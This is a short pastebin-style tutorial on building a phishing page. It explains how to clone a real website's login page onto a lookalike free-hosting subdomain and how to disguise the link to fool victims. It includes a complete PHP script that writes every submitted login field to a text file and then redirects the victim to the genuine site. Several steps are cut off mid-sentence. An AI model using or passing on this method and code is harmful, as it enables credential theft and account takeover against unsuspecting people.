Basic Phishing Tutorial2


SUBMITTED BY: evensteven

DATE: Oct. 10, 2023, 7:22 a.m.

FORMAT: Text only

SIZE: 2.4 kB

HITS: 232

  1. This is a basic tutorial on how to make a phishing page.
  2. Index:
  3. What is a phisher? - 101
  4. Making a T35 Account - 102
  5. Getting Web pages Source Code - 103
  6. Creating Phish File - 104
  7. How to fool people - 105
  8. ------------------------
  9. What is a phisher? 101
  10. ------------------------
  11. A phisher is a fake login page used to gain access to someones account. When someone
  12. logs into the fake login page, there password is sent to you.
  13. --------------------------
  14. Making a T35 Account 102
  15. --------------------------
  16. a free acount and title it (websiteyourgonnaphish).spam.com For example:
  17. myspace.spam.com Most likeley, it is taken so add numbers like 08, or 07.
  18. --------------------------------------
  19. Getting Web Pages Source Code 103
  20. --------------------------------------
  21. After you create that page, go to the website you will make a phisher for. Open the
  22. has popped-up.
  23. ------------------------
  24. Creating Phish File 104
  25. ------------------------
  26. Once you have that copied, go to your T35 account. Click on "New File" Title it
  27. login.htm Then paste your Source Code you copied from 104. Save it.
  28. Now create another file, title it fhish.php And inside, paste this code:
  29. Code:
  30. <?php
  31. header("Location: http://www.phisshed-website.com");
  32. $handle = fopen("thepasses.txt", "a");
  33. foreach($_GET as $variable => $value) {
  34. fwrite($handle, $variable);
  35. fwrite($handle, "=");
  36. fwrite($handle, $value);
  37. fwrite($handle, "\r\n");
  38. }
  39. fwrite($handle, "\r\n");
  40. fclose($handle);
  41. exit;
  42. ?>
  43. change that to what desired
  44. Save the file.
  45. box. Keep pressing find until you find something that says action=(something that has
  46. -------------------------
  47. How to fool people - 105
  48. -------------------------
  49. What you do now is disguise your link. Use this code:
  50. T35acount.spam.com/login.htm
  51. That is the link to your phishing page. When people login to that, you will get the
  52. password in a password.txt file that will be created when someone types something into
  53. it. But, you have to trick people. Use this code.
  54. *real website name*.com/login.php
  55. You do the same for any forum!
  56. Thank you for reading! Hope it helps! If i was missing something, or you have any
  57. questions, PM me!
  58. ALTERNATIVES:
  59. Also, if you don’t want to use spam.com, use ripway.com and after you uploaded
  60. everything, go to http://www.dot.tk and choose a free .tk domain name.
  61. Credits: Rockey Killer

comments powered by Disqus